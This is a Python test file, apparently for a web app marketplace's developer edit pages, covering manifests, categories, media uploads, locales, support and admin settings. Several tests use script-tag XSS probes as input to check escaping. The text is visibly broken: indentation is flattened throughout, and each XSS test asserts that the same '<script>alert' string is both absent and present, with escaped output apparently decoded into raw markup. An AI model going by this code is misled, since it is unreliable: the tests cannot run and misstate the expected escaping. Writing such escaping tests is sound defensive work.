def test_view_manifest_changed_dupe_app_domain(self):
Switch.objects.create(name='webapps-unique-by-domain', active=True)
amo.tests.app_factory(name='Super Duper',
app_domain='https://ballin.com')
self.client.login(username='[email protected]', password='password')
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva.webapp'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
form = r.context['form']
assert 'manifest_url' in form.errors
assert 'one app per domain' in form.errors['manifest_url'][0]
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url,
'Manifest URL should not have been changed!')
def test_view_manifest_changed_same_domain_diff_path(self):
Switch.objects.create(name='webapps-unique-by-domain', active=True)
self.client.login(username='[email protected]', password='password')
# POST with the new manifest URL for same domain but w/ different path.
data = self.get_dict(manifest_url=self.webapp.manifest_url + 'xxx')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url + 'xxx',
'Manifest URL should have changed!')
def test_view_manifest_url_changed(self):
new_url = 'http://omg.org/yes'
self.webapp.manifest_url = new_url
self.webapp.save()
# If we change the `manifest_url` manually, the URL here should change.
r = self.client.get(self.url)
eq_(pq(r.content)('#manifest-url a').attr('href'), new_url)
def test_categories_listed(self):
r = self.client.get(self.url)
eq_(pq(r.content)('#addon-categories-edit').text(),
unicode(self.cat.name))
r = self.client.post(self.url)
eq_(pq(r.content)('#addon-categories-edit').text(),
unicode(self.cat.name))
def test_edit_categories_add(self):
new = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
cats = [self.cat.id, new.id]
self.client.post(self.edit_url, self.get_dict(categories=cats))
app_cats = self.get_webapp().categories.values_list('id', flat=True)
eq_(sorted(app_cats), cats)
def test_edit_categories_addandremove(self):
new = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
cats = [new.id]
self.client.post(self.edit_url, self.get_dict(categories=cats))
app_cats = self.get_webapp().categories.values_list('id', flat=True)
eq_(sorted(app_cats), cats)
@mock.patch('mkt.webapps.models.Webapp.save')
def test_edit_categories_required(self, save):
r = self.client.post(self.edit_url, self.get_dict(categories=[]))
assert_required(r.context['cat_form'].errors['categories'][0])
assert not save.called
def test_edit_categories_xss(self):
new = Category.objects.create(name='<script>alert("xss");</script>',
type=amo.ADDON_WEBAPP)
cats = [self.cat.id, new.id]
r = self.client.post(self.edit_url, self.get_dict(categories=cats))
assert '<script>alert' not in r.content
assert '<script>alert' in r.content
def test_edit_categories_nonexistent(self):
r = self.client.post(self.edit_url, self.get_dict(categories=[100]))
eq_(r.context['cat_form'].errors['categories'],
['Select a valid choice. 100 is not one of the available '
'choices.'])
def test_edit_categories_max(self):
new1 = Category.objects.create(name='Books', type=amo.ADDON_WEBAPP)
new2 = Category.objects.create(name='Lifestyle', type=amo.ADDON_WEBAPP)
cats = [self.cat.id, new1.id, new2.id]
r = self.client.post(self.edit_url, self.get_dict(categories=cats))
eq_(r.context['cat_form'].errors['categories'],
['You can have only 2 categories.'])
def test_edit_check_description(self):
# Make sure bug 629779 doesn't return.
r = self.client.post(self.edit_url, self.get_dict())
eq_(r.status_code, 200)
eq_(self.get_webapp().description, self.get_dict()['description'])
def test_edit_slug_valid(self):
old_edit = self.edit_url
data = self.get_dict(slug='valid')
r = self.client.post(self.edit_url, data)
doc = pq(r.content)
assert doc('form').attr('action') != old_edit
def test_edit_as_developer(self):
self.client.login(username='[email protected]', password='password')
data = self.get_dict()
r = self.client.post(self.edit_url, data)
# Make sure we get errors when they are just regular users.
eq_(r.status_code, 403)
AddonUser.objects.create(addon=self.webapp, user_id=999,
role=amo.AUTHOR_ROLE_DEV)
r = self.client.post(self.edit_url, data)
eq_(r.status_code, 200)
webapp = self.get_webapp()
eq_(unicode(webapp.app_slug), data['slug'].lower())
eq_(unicode(webapp.description), data['description'])
def test_l10n(self):
self.webapp.update(default_locale='en-US')
url = self.webapp.get_dev_url('edit')
r = self.client.get(url)
eq_(pq(r.content)('#l10n-menu').attr('data-default'), 'en-us',
'l10n menu not visible for %s' % url)
def test_l10n_not_us(self):
self.webapp.update(default_locale='fr')
url = self.webapp.get_dev_url('edit')
r = self.client.get(url)
eq_(pq(r.content)('#l10n-menu').attr('data-default'), 'fr',
'l10n menu not visible for %s' % url)
def test_edit_l10n(self):
data = {
'slug': self.webapp.app_slug,
'manifest_url': self.webapp.manifest_url,
'categories': [self.cat.id],
'description_en-us': u'Nêw english description',
'description_fr': u'Nëw french description',
'releasenotes_en-us': u'Nëw english release notes',
'releasenotes_fr': u'Nêw french release notes'
}
res = self.client.post(self.edit_url, data)
eq_(res.status_code, 200)
self.webapp = self.get_webapp()
version = self.webapp.current_version.reload()
desc_id = self.webapp.description_id
notes_id = version.releasenotes_id
eq_(self.webapp.description, data['description_en-us'])
eq_(version.releasenotes, data['releasenotes_en-us'])
eq_(unicode(Translation.objects.get(id=desc_id, locale='fr')),
data['description_fr'])
eq_(unicode(Translation.objects.get(id=desc_id, locale='en-us')),
data['description_en-us'])
eq_(unicode(Translation.objects.get(id=notes_id, locale='fr')),
data['releasenotes_fr'])
eq_(unicode(Translation.objects.get(id=notes_id, locale='en-us')),
data['releasenotes_en-us'])
@mock.patch('mkt.developers.views._update_manifest')
def test_refresh(self, fetch):
self.client.login(username='[email protected]',
password='password')
url = reverse('mkt.developers.apps.refresh_manifest',
args=[self.webapp.app_slug])
r = self.client.post(url)
eq_(r.status_code, 204)
fetch.assert_called_once_with(self.webapp.pk, True, {})
@mock.patch('mkt.developers.views._update_manifest')
def test_refresh_dev_only(self, fetch):
self.client.login(username='[email protected]',
password='password')
url = reverse('mkt.developers.apps.refresh_manifest',
args=[self.webapp.app_slug])
r = self.client.post(url)
eq_(r.status_code, 403)
eq_(fetch.called, 0)
def test_view_developer_name(self):
r = self.client.get(self.url)
developer_name = self.webapp.current_version.developer_name
content = smart_unicode(r.content)
eq_(pq(content)('#developer-name td').html().strip(), developer_name)
def test_view_developer_name_xss(self):
version = self.webapp.current_version
version._developer_name = '<script>alert("xss-devname")</script>'
version.save()
r = self.client.get(self.url)
assert '<script>alert' not in r.content
assert '<script>alert' in r.content
def test_edit_packaged(self):
self.get_webapp().update(is_packaged=True)
data = self.get_dict()
data.pop('manifest_url')
r = self.client.post(self.edit_url, data)
eq_(r.status_code, 200)
eq_(r.context['editable'], False)
eq_(self.get_webapp().description, self.get_dict()['description'])
def test_edit_basic_not_public(self):
# Disable file for latest version, and then update app.current_version.
app = self.get_webapp()
app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
app.update_version()
# Now try to display edit page.
r = self.client.get(self.url)
eq_(r.status_code, 200)
def test_view_release_notes(self):
version = self.webapp.current_version
version.releasenotes = u'Chëese !'
version.save()
res = self.client.get(self.url)
eq_(res.status_code, 200)
content = smart_unicode(res.content)
eq_(pq(content)('#releasenotes td span[lang]').html().strip(),
version.releasenotes)
self.webapp.update(is_packaged=True)
res = self.client.get(self.url)
eq_(res.status_code, 200)
content = smart_unicode(res.content)
eq_(pq(content)('#releasenotes').length, 0)
def test_edit_release_notes(self):
self.webapp.previews.create()
self.webapp.support_email = '[email protected]'
self.webapp.save()
data = self.get_dict(releasenotes=u'I can hâz release notes')
res = self.client.post(self.edit_url, data)
releasenotes = self.webapp.current_version.reload().releasenotes
eq_(res.status_code, 200)
eq_(releasenotes, data['releasenotes'])
# Make sure make_public wasn't reset by accident.
eq_(self.webapp.reload().make_public, None)
def test_edit_release_notes_pending(self):
# Like test_edit_release_notes, but with a pending app.
file_ = self.webapp.current_version.all_files[0]
file_.update(status=amo.STATUS_PENDING)
self.webapp.update(status=amo.STATUS_PENDING)
self.test_edit_release_notes()
eq_(self.webapp.reload().status, amo.STATUS_PENDING)
def test_edit_release_notes_packaged(self):
# You are not supposed to edit release notes from the basic edit
# page if you app is packaged. Instead this is done from the version
# edit page.
self.webapp.update(is_packaged=True)
data = self.get_dict(releasenotes=u'I can not hâz release notes')
res = self.client.post(self.edit_url, data)
releasenotes = self.webapp.current_version.reload().releasenotes
eq_(res.status_code, 200)
eq_(releasenotes, None)
def test_view_releasenotes_xss(self):
version = self.webapp.current_version
version.releasenotes = '<script>alert("xss-devname")</script>'
version.save()
r = self.client.get(self.url)
assert '<script>alert' not in r.content
assert '<script>alert' in r.content
class TestEditCountryLanguage(TestEdit):
def get_webapp(self):
return Addon.objects.get(id=337141)
def test_data_visible(self):
clean_countries = []
self.get_webapp().current_version.update(supported_locales='de,es')
res = self.client.get(self.url)
eq_(res.status_code, 200)
countries = (pq(pq(res.content)('#edit-app-language tr').eq(0))
.find('td').remove('small').text())
langs = (pq(pq(res.content)('#edit-app-language tr').eq(1)).find('td')
.remove('small').text())
for c in countries.split(', '):
clean_countries.append(strip_whitespace(c))
## eq_(langs, u'English (US) (default), Deutsch, Espa\xf1ol')
# XXX The above line is correct. But if Jenkins is wrong, I
# don't wanna be right.
eq_(langs, u'English (US) (default), Deutsch, Espa\xc3\xb1ol')
self.assertSetEqual(
sorted(clean_countries),
sorted([r.name.decode() for r in regions.ALL_REGIONS]))
class TestEditMedia(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditMedia, self).setUp()
self.url = self.get_url('media')
self.edit_url = self.get_url('media', True)
self.icon_upload = self.webapp.get_dev_url('upload_icon')
self.preview_upload = self.webapp.get_dev_url('upload_preview')
patches = {
'ADDON_ICONS_PATH': tempfile.mkdtemp(),
'PREVIEW_THUMBNAIL_PATH': tempfile.mkstemp()[1] + '%s/%d.png',
}
for k, v in patches.iteritems():
patcher = mock.patch.object(settings, k, v)
patcher.start()
self.addCleanup(patcher.stop)
def formset_new_form(self, *args, **kw):
ctx = self.client.get(self.edit_url).context
blank = initial(ctx['preview_form'].forms[-1])
blank.update(**kw)
return blank
def formset_media(self, prev_blank=None, *args, **kw):
prev_blank = prev_blank or {}
kw.setdefault('initial_count', 0)
kw.setdefault('prefix', 'files')
# Preview formset.
fs = formset(*list(args) + [self.formset_new_form(**prev_blank)], **kw)
return dict((k, '' if v is None else v) for k, v in fs.items())
def new_preview_hash(self):
# At least one screenshot is required.
src_image = open(get_image_path('preview.jpg'), 'rb')
r = self.client.post(self.preview_upload,
dict(upload_image=src_image))
return {'upload_hash': json.loads(r.content)['upload_hash']}
def test_form_url(self):
self.check_form_url('media')
def test_edit_defaulticon(self):
data = dict(icon_type='')
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
assert webapp.get_icon_url(128).endswith('icons/default-128.png')
assert webapp.get_icon_url(64).endswith('icons/default-64.png')
for k in data:
eq_(unicode(getattr(webapp, k)), data[k])
def test_edit_preuploadedicon(self):
data = dict(icon_type='icon/appearance')
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
assert webapp.get_icon_url(64).endswith('icons/appearance-64.png')
assert webapp.get_icon_url(128).endswith('icons/appearance-128.png')
for k in data:
eq_(unicode(getattr(webapp, k)), data[k])
def test_edit_uploadedicon(self):
img = get_image_path('mozilla-sq.png')
src_image = open(img, 'rb')
response = self.client.post(self.icon_upload,
dict(upload_image=src_image))
response_json = json.loads(response.content)
webapp = self.get_webapp()
# Now, save the form so it gets moved properly.
data = dict(icon_type='image/png',
icon_upload_hash=response_json['upload_hash'])
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
# Unfortunate hardcoding of URL.
url = webapp.get_icon_url(64)
assert ('addon_icons/%s/%s' % (webapp.id / 1000, webapp.id)) in url, (
'Unexpected path: %r' % url)
eq_(data['icon_type'], 'image/png')
# Check that it was actually uploaded.
dirname = os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (webapp.id / 1000))
dest = os.path.join(dirname, '%s-32.png' % webapp.id)
eq_(storage.exists(dest), True)
eq_(Image.open(storage.open(dest)).size, (32, 32))
def test_edit_icon_log(self):
self.test_edit_uploadedicon()
log = ActivityLog.objects.all()
eq_(log.count(), 1)
eq_(log[0].action, amo.LOG.CHANGE_ICON.id)
def test_edit_uploadedicon_noresize(self):
img = '%s/img/mkt/logos/128.png' % settings.MEDIA_ROOT
src_image = open(img, 'rb')
data = dict(upload_image=src_image)
response = self.client.post(self.icon_upload, data)
response_json = json.loads(response.content)
webapp = self.get_webapp()
# Now, save the form so it gets moved properly.
data = dict(icon_type='image/png',
icon_upload_hash=response_json['upload_hash'])
data_formset = self.formset_media(prev_blank=self.new_preview_hash(),
**data)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
webapp = self.get_webapp()
# Unfortunate hardcoding of URL.
addon_url = webapp.get_icon_url(64).split('?')[0]
end = 'addon_icons/%s/%s-64.png' % (webapp.id / 1000, webapp.id)
assert addon_url.endswith(end), 'Unexpected path: %r' % addon_url
eq_(data['icon_type'], 'image/png')
# Check that it was actually uploaded.
dirname = os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (webapp.id / 1000))
dest = os.path.join(dirname, '%s-64.png' % webapp.id)
assert storage.exists(dest), dest
eq_(Image.open(storage.open(dest)).size, (64, 64))
def test_media_types(self):
res = self.client.get(self.get_url('media', edit=True))
doc = pq(res.content)
eq_(doc('#id_icon_upload').attr('data-allowed-types'),
'image/jpeg|image/png')
eq_(doc('.screenshot_upload').attr('data-allowed-types'),
'image/jpeg|image/png|video/webm')
def check_image_type(self, url, msg):
img = '%s/js/devreg/devhub.js' % settings.MEDIA_ROOT
self.check_image_type_path(img, url, msg)
def check_image_type_path(self, img, url, msg):
src_image = open(img, 'rb')
res = self.client.post(url, {'upload_image': src_image})
response_json = json.loads(res.content)
assert any(e == msg for e in response_json['errors']), (
response_json['errors'])
# The check_image_type method uploads js, so let's try sending that
# to ffmpeg to see what it thinks.
@mock.patch.object(amo, 'VIDEO_TYPES', ['application/javascript'])
def test_edit_video_wrong_type(self):
raise SkipTest
self.check_image_type(self.preview_upload, 'Videos must be in WebM.')
def test_edit_icon_wrong_type(self):
self.check_image_type(self.icon_upload,
'Icons must be either PNG or JPG.')
def test_edit_screenshot_wrong_type(self):
self.check_image_type(self.preview_upload,
'Images must be either PNG or JPG.')
def setup_image_status(self):
self.icon_dest = os.path.join(self.webapp.get_icon_dir(),
'%s-64.png' % self.webapp.id)
os.makedirs(os.path.dirname(self.icon_dest))
open(self.icon_dest, 'w')
self.preview = self.webapp.previews.create()
self.preview.save()
os.makedirs(os.path.dirname(self.preview.thumbnail_path))
open(self.preview.thumbnail_path, 'w')
self.url = self.webapp.get_dev_url('ajax.image.status')
def test_icon_square(self):
img = get_image_path('mozilla.png')
self.check_image_type_path(img, self.icon_upload,
'Icons must be square.')
def test_icon_status_no_choice(self):
self.webapp.update(icon_type='')
url = self.webapp.get_dev_url('ajax.image.status')
result = json.loads(self.client.get(url).content)
assert result['icons']
def test_icon_status_works(self):
self.setup_image_status()
result = json.loads(self.client.get(self.url).content)
assert result['icons']
def test_icon_status_fails(self):
self.setup_image_status()
os.remove(self.icon_dest)
result = json.loads(self.client.get(self.url).content)
assert not result['icons']
def test_preview_status_works(self):
self.setup_image_status()
result = json.loads(self.client.get(self.url).content)
assert result['previews']
# No previews means that all the images are done.
self.webapp.previews.all().delete()
result = json.loads(self.client.get(self.url).content)
assert result['previews']
def test_preview_status_fails(self):
self.setup_image_status()
os.remove(self.preview.thumbnail_path)
result = json.loads(self.client.get(self.url).content)
assert not result['previews']
def test_image_status_default(self):
self.setup_image_status()
os.remove(self.icon_dest)
self.webapp.update(icon_type='icon/photos')
result = json.loads(self.client.get(self.url).content)
assert result['icons']
def test_icon_size_req(self):
filehandle = open(get_image_path('sunbird-small.png'), 'rb')
res = self.client.post(self.icon_upload, {'upload_image': filehandle})
response_json = json.loads(res.content)
assert any(e == 'Icons must be at least 128px by 128px.' for e in
response_json['errors'])
def check_image_animated(self, url, msg):
filehandle = open(get_image_path('animated.png'), 'rb')
res = self.client.post(url, {'upload_image': filehandle})
response_json = json.loads(res.content)
assert any(e == msg for e in response_json['errors'])
def test_icon_animated(self):
self.check_image_animated(self.icon_upload,
'Icons cannot be animated.')
def test_screenshot_animated(self):
self.check_image_animated(self.preview_upload,
'Images cannot be animated.')
@mock.patch('lib.video.ffmpeg.Video')
@mock.patch('mkt.developers.utils.video_library')
def add(self, handle, Video, video_library, num=1):
data_formset = self.formset_media(upload_image=handle)
r = self.client.post(self.preview_upload, data_formset)
self.assertNoFormErrors(r)
upload_hash = json.loads(r.content)['upload_hash']
# Create and post with the formset.
fields = []
for i in xrange(num):
fields.append(self.formset_new_form(upload_hash=upload_hash,
position=i))
data_formset = self.formset_media(*fields)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
def preview_add(self, num=1):
self.add(open(get_image_path('preview.jpg'), 'rb'), num=num)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def preview_video_add(self, num=1):
self.add(open(video_files['good'], 'rb'), num=num)
@mock.patch('lib.video.ffmpeg.Video')
@mock.patch('mkt.developers.utils.video_library')
def add_json(self, handle, Video, video_library):
data_formset = self.formset_media(upload_image=handle)
result = self.client.post(self.preview_upload, data_formset)
return json.loads(result.content)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_add_hash(self):
res = self.add_json(open(video_files['good'], 'rb'))
assert not res['errors'], res['errors']
assert res['upload_hash'].endswith('.video-webm'), res['upload_hash']
def test_edit_preview_add_hash(self):
res = self.add_json(open(get_image_path('preview.jpg'), 'rb'))
assert res['upload_hash'].endswith('.image-jpeg'), res['upload_hash']
def test_edit_preview_add_hash_size(self):
res = self.add_json(open(get_image_path('mozilla.png'), 'rb'))
assert any(e.startswith('App previews ') for e in res['errors']), (
'Small screenshot not flagged for size.')
@mock.patch.object(settings, 'MAX_VIDEO_UPLOAD_SIZE', 1)
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_size(self):
res = self.add_json(open(video_files['good'], 'rb'))
assert any(e.startswith('Please use files smaller than')
for e in res['errors']), (res['errors'])
@mock.patch('lib.video.tasks.resize_video')
@mock.patch('mimetypes.guess_type', lambda *a: ('video/webm', 'webm'))
def test_edit_preview_video_add(self, resize_video):
eq_(self.get_webapp().previews.count(), 0)
self.preview_video_add()
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_add(self):
eq_(self.get_webapp().previews.count(), 0)
self.preview_add()
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_edit(self):
self.preview_add()
preview = self.get_webapp().previews.all()[0]
edited = {'upload_hash': 'xxx',
'id': preview.id,
'position': preview.position,
'file_upload': None}
data_formset = self.formset_media(edited, initial_count=1)
self.client.post(self.edit_url, data_formset)
eq_(self.get_webapp().previews.count(), 1)
def test_edit_preview_reorder(self):
self.preview_add(3)
previews = list(self.get_webapp().previews.all())
base = dict(upload_hash='xxx', file_upload=None)
# Three preview forms were generated; mix them up here.
a = dict(position=1, id=previews[2].id)
b = dict(position=2, id=previews[0].id)
c = dict(position=3, id=previews[1].id)
a.update(base)
b.update(base)
c.update(base)
# Add them in backwards ("third", "second", "first")
data_formset = self.formset_media({}, *(c, b, a), initial_count=3)
eq_(data_formset['files-0-id'], previews[1].id)
eq_(data_formset['files-1-id'], previews[0].id)
eq_(data_formset['files-2-id'], previews[2].id)
self.client.post(self.edit_url, data_formset)
# They should come out "first", "second", "third".
eq_(self.get_webapp().previews.all()[0].id, previews[2].id)
eq_(self.get_webapp().previews.all()[1].id, previews[0].id)
eq_(self.get_webapp().previews.all()[2].id, previews[1].id)
def test_edit_preview_delete(self):
self.preview_add()
self.preview_add()
orig_previews = self.get_webapp().previews.all()
# Delete second preview. Keep the first.
edited = {'DELETE': 'checked',
'upload_hash': 'xxx',
'id': orig_previews[1].id,
'position': 0,
'file_upload': None}
ctx = self.client.get(self.edit_url).context
first = initial(ctx['preview_form'].forms[0])
first['upload_hash'] = 'xxx'
data_formset = self.formset_media(edited, *(first,), initial_count=2)
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
# First one should still be there.
eq_(list(self.get_webapp().previews.all()), [orig_previews[0]])
def test_edit_preview_add_another(self):
self.preview_add()
self.preview_add()
eq_(self.get_webapp().previews.count(), 2)
def test_edit_preview_add_two(self):
self.preview_add(2)
eq_(self.get_webapp().previews.count(), 2)
def test_screenshot_video_required(self):
r = self.client.post(self.edit_url, self.formset_media())
eq_(r.context['preview_form'].non_form_errors(),
['You must upload at least one screenshot or video.'])
def test_screenshot_with_icon(self):
self.preview_add()
preview = self.get_webapp().previews.all()[0]
edited = {'upload_hash': '', 'id': preview.id}
data_formset = self.formset_media(edited, initial_count=1)
data_formset.update(icon_type='image/png', icon_upload_hash='')
r = self.client.post(self.edit_url, data_formset)
self.assertNoFormErrors(r)
class TestEditDetails(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditDetails, self).setUp()
self.url = self.get_url('details')
self.edit_url = self.get_url('details', edit=True)
def get_dict(self, **kw):
data = dict(default_locale='en-US',
homepage='http://twitter.com/fligtarsmom',
privacy_policy="fligtar's mom does <em>not</em> share "
"your data with third parties.")
data.update(kw)
return data
def test_form_url(self):
self.check_form_url('details')
def test_edit(self):
data = self.get_dict()
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
def test_privacy_policy_xss(self):
self.webapp.privacy_policy = ("We\n<b>own</b>your"
"<script>alert('soul')</script>")
self.webapp.save()
r = self.client.get(self.url)
eq_(pq(r.content)('#addon-privacy-policy span[lang]').html(),
"We<br/><b>own</b>your<script>"
"alert('soul')</script>")
def test_edit_exclude_optional_fields(self):
data = self.get_dict()
data.update(default_locale='en-US', homepage='',
privacy_policy='we sell your data to everyone')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
def test_edit_default_locale_required_trans(self):
# name and description are required in the new locale.
data = self.get_dict()
data.update(description='bullocks',
homepage='http://omg.org/yes',
privacy_policy='your data is delicious')
fields = ['name', 'description']
error = ('Before changing your default locale you must have a name '
'and description in that locale. You are missing %s.')
missing = lambda f: error % ', '.join(map(repr, f))
data.update(default_locale='pt-BR')
r = self.client.post(self.edit_url, data)
self.assertFormError(r, 'form', None, missing(fields))
# Now we have a name.
self.webapp.name = {'pt-BR': 'pt-BR name'}
self.webapp.save()
fields.remove('name')
r = self.client.post(self.edit_url, data)
self.assertFormError(r, 'form', None, missing(fields))
def test_edit_default_locale_frontend_error(self):
data = self.get_dict()
data.update(description='xx', homepage='http://google.com',
default_locale='pt-BR', privacy_policy='pp')
rp = self.client.post(self.edit_url, data)
self.assertContains(rp,
'Before changing your default locale you must')
def test_edit_locale(self):
self.webapp.update(default_locale='en-US')
r = self.client.get(self.url)
eq_(pq(r.content)('.addon_edit_locale').eq(0).text(),
'English (US)')
def test_homepage_url_optional(self):
r = self.client.post(self.edit_url, self.get_dict(homepage=''))
self.assertNoFormErrors(r)
def test_homepage_url_invalid(self):
r = self.client.post(self.edit_url,
self.get_dict(homepage='xxx'))
self.assertFormError(r, 'form', 'homepage', 'Enter a valid URL.')
def test_games_already_excluded_in_brazil(self):
AER.objects.create(addon=self.webapp, region=mkt.regions.BR.id)
games = Category.objects.create(type=amo.ADDON_WEBAPP, slug='games')
r = self.client.post(
self.edit_url, self.get_dict(categories=[games.id]))
self.assertNoFormErrors(r)
eq_(list(AER.objects.filter(addon=self.webapp)
.values_list('region', flat=True)),
[mkt.regions.BR.id])
class TestEditSupport(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditSupport, self).setUp()
self.url = self.get_url('support')
self.edit_url = self.get_url('support', edit=True)
def test_form_url(self):
self.check_form_url('support')
def test_edit_support(self):
data = dict(support_email='[email protected]',
support_url='http://apple.com/')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
def test_edit_support_free_required(self):
r = self.client.post(self.edit_url, dict(support_url=''))
self.assertFormError(r, 'form', 'support_email',
'This field is required.')
def test_edit_support_premium_required(self):
self.get_webapp().update(premium_type=amo.ADDON_PREMIUM)
r = self.client.post(self.edit_url, dict(support_url=''))
self.assertFormError(r, 'form', 'support_email',
'This field is required.')
def test_edit_support_premium(self):
self.get_webapp().update(premium_type=amo.ADDON_PREMIUM)
data = dict(support_email='[email protected]',
support_url='')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
eq_(self.get_webapp().support_email, data['support_email'])
def test_edit_support_url_optional(self):
data = dict(support_email='[email protected]', support_url='')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare(data)
class TestEditTechnical(TestEdit):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestEditTechnical, self).setUp()
self.url = self.get_url('technical')
self.edit_url = self.get_url('technical', edit=True)
def test_form_url(self):
self.check_form_url('technical')
def test_toggles(self):
# Turn everything on.
r = self.client.post(self.edit_url, formset(**{'flash': 'on'}))
self.assertNoFormErrors(r)
self.compare({'uses_flash': True})
# And off.
r = self.client.post(self.edit_url, formset(**{'flash': ''}))
self.compare({'uses_flash': False})
def test_public_stats(self):
o = ActivityLog.objects
eq_(o.count(), 0)
eq_(self.webapp.public_stats, False)
assert not self.webapp.public_stats, (
'Unexpectedly found public stats for app. Says Basta.')
r = self.client.post(self.edit_url, formset(public_stats=True))
self.assertNoFormErrors(r)
self.compare({'public_stats': True})
eq_(o.filter(action=amo.LOG.EDIT_PROPERTIES.id).count(), 1)
def test_features_hosted(self):
data_on = {'has_contacts': True}
data_off = {'has_contacts': False}
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
# Turn contacts on.
r = self.client.post(self.edit_url, formset(**data_on))
self.assertNoFormErrors(r)
self.compare_features(data_on)
# And turn it back off.
r = self.client.post(self.edit_url, formset(**data_off))
self.assertNoFormErrors(r)
self.compare_features(data_off)
# Changing features must trigger re-review.
assert RereviewQueue.objects.filter(addon=self.webapp).exists()
def test_features_hosted_app_disabled(self):
# Reject the app.
app = self.get_webapp()
app.update(status=amo.STATUS_REJECTED)
app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
app.update_version()
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
data_on = {'has_contacts': True}
data_off = {'has_contacts': False}
# Display edit technical page
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
# Turn contacts on.
r = self.client.post(self.edit_url, formset(**data_on))
app = self.get_webapp()
self.assertNoFormErrors(r)
self.compare_features(data_on, version=app.latest_version)
# Display edit technical page again, is the feature on ?
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
ok_(pq(r.content)('#id_has_contacts:checked'))
# And turn it back off.
r = self.client.post(self.edit_url, formset(**data_off))
app = self.get_webapp()
self.assertNoFormErrors(r)
self.compare_features(data_off, version=app.latest_version)
# Changing features on a rejected app must NOT trigger re-review.
assert not RereviewQueue.objects.filter(addon=self.webapp).exists()
class TestAdmin(TestEdit):
fixtures = TestEdit.fixtures
def setUp(self):
super(TestAdmin, self).setUp()
self.url = self.get_url('admin')
self.edit_url = self.get_url('admin', edit=True)
self.webapp = self.get_webapp()
assert self.client.login(username='[email protected]',
password='password')
def log_in_user(self):
assert self.client.login(username=self.user.email, password='password')
def log_in_with(self, rules):
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Whatever', rules=rules)
GroupUser.objects.create(group=group, user=user)
assert self.client.login(username=user.email, password='password')
class TestAdminSettings(TestAdmin):
fixtures = TestEdit.fixtures
def test_form_url(self):
self.check_form_url('admin')
def test_overview_visible_as_admin(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('form').length, 1)
assert not r.context.get('form'), (
'Admin Settings form should not be in context')
def test_overview_forbidden_for_nonadmin(self):
self.log_in_user()
eq_(self.client.head(self.url).status_code, 403)
def test_edit_get_as_admin(self):
r = self.client.get(self.edit_url)
eq_(r.status_code, 200)
eq_(pq(r.content)('form').length, 1)
assert r.context.get('form'), 'Admin Settings form expected in context'
def test_edit_post_as_admin(self):
# There are errors, but I don't care. I just want to see if I can POST.
eq_(self.client.post(self.edit_url).status_code, 200)
def test_edit_no_get_as_nonadmin(self):
self.log_in_user()
eq_(self.client.get(self.edit_url).status_code, 403)
def test_edit_no_post_as_nonadmin(self):
self.log_in_user()
eq_(self.client.post(self.edit_url).status_code, 403)
def post_contact(self, **kw):
data = {'position': '1',
'upload_hash': 'abcdef',
'mozilla_contact': '[email protected]'}
data.update(kw)
return self.client.post(self.edit_url, data)
def test_mozilla_contact(self):
self.post_contact()
webapp = self.get_webapp()
eq_(webapp.mozilla_contact, '[email protected]')
def test_mozilla_contact_cleared(self):
self.post_contact(mozilla_contact='')
webapp = self.get_webapp()
eq_(webapp.mozilla_contact, '')
def test_mozilla_contact_invalid(self):
r = self.post_contact(
mozilla_contact='<script>alert("xss")</script>@mozilla.com')
webapp = self.get_webapp()
self.assertFormError(r, 'form', 'mozilla_contact',
'Enter a valid email address.')
eq_(webapp.mozilla_contact, '')
def test_vip_app_toggle(self):
# Turn on.
data = {
'position': 1, # Required, useless in this test.
'vip_app': 'on'
}
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare({'vip_app': True})
# And off.
data.update({'vip_app': ''})
r = self.client.post(self.edit_url, data)
self.compare({'vip_app': False})
def test_priority_review_toggle(self):
# Turn on.
data = {
'position': 1, # Required, useless in this test.
'priority_review': 'on'
}
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
self.compare({'priority_review': True})
# And off.
data = {'position': 1}
r = self.client.post(self.edit_url, data)
